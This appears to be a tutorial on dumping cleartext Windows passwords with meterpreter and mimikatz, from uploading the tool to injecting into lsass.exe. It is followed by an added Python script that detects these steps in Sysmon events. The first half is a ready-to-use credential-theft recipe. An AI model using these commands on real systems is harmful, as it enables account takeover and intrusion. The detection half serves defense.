Step 1:
Hack the Windows 7 machine and get a meterpreter shell (as I demonstrated in the previous post).
Step 2:
Now gain system-level privileges (using the sysret.exe method, as demonstrated in the previous post).
Step 3:
Type the following commands inside the meterpreter shell:
- upload <path of mimikatz.exe> c:\\
- upload <path of sekurlsa.dll> c:\\
Step 4:
- Get into the Windows command prompt by typing the "shell" command
- Then get the mimikatz shell by typing "mimikatz" at the command prompt
*Note: first navigate to the directory where mimikatz was uploaded.
Step 5:
Now type the following commands:
- privilege::debug
- inject::process lsass.exe sekurlsa.dll
- sekurlsa::logonPasswords full
After typing the third command, you can view the cleartext password on your screen :)
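
From the defender's side, the steps above leave three observable traces: the two files written to c:\, a process outside the system directories opening lsass.exe, and lsass.exe loading a DLL from outside System32. The following is an added example, not part of the original post. It assumes Sysmon is deployed and that its file-create (ID 11), image-load (ID 7) and process-access (ID 10) events have already been parsed into dicts; the function names and sample events are constructed for illustration.

```python
import ntpath

# File names taken from the steps in this post. Renaming defeats this rule,
# so the two lsass.exe rules below are the ones that carry the detection.
TOOL_FILES = {"mimikatz.exe", "sekurlsa.dll"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def _base(path):
    return ntpath.basename(path).lower()

def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)

def detect(event):
    """Return finding names for one parsed Sysmon-style event (a dict)."""
    findings = []
    eid = event.get("EventID")
    if eid == 11 and _base(event.get("TargetFilename", "")) in TOOL_FILES:
        findings.append("tool_file_dropped")
    elif eid == 7 and _base(event.get("Image", "")) == "lsass.exe":
        # lsass.exe normally loads its DLLs from the system directory only.
        if not _in_system_dir(event.get("ImageLoaded", "")):
            findings.append("lsass_loaded_dll_outside_system32")
    elif eid == 10 and _base(event.get("TargetImage", "")) == "lsass.exe":
        if not _in_system_dir(event.get("SourceImage", "")):
            findings.append("lsass_opened_by_non_system_image")
    return findings

def scan(events):
    """Return (event index, finding) pairs for a list of events."""
    return [(i, f) for i, e in enumerate(events) for f in detect(e)]

# Constructed sample events, not captured from a real host.
LSASS = r"C:\Windows\System32\lsass.exe"
SAMPLE_EVENTS = [
    {"EventID": 11, "TargetFilename": r"c:\mimikatz.exe"},
    {"EventID": 11, "TargetFilename": r"c:\sekurlsa.dll"},
    {"EventID": 10, "SourceImage": r"c:\mimikatz.exe", "TargetImage": LSASS},
    {"EventID": 7, "Image": LSASS, "ImageLoaded": r"c:\sekurlsa.dll"},
    # Benign baseline: system DLL load and system process access.
    {"EventID": 7, "Image": LSASS,
     "ImageLoaded": r"C:\Windows\System32\kerberos.dll"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": LSASS},
]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(idx, finding)
```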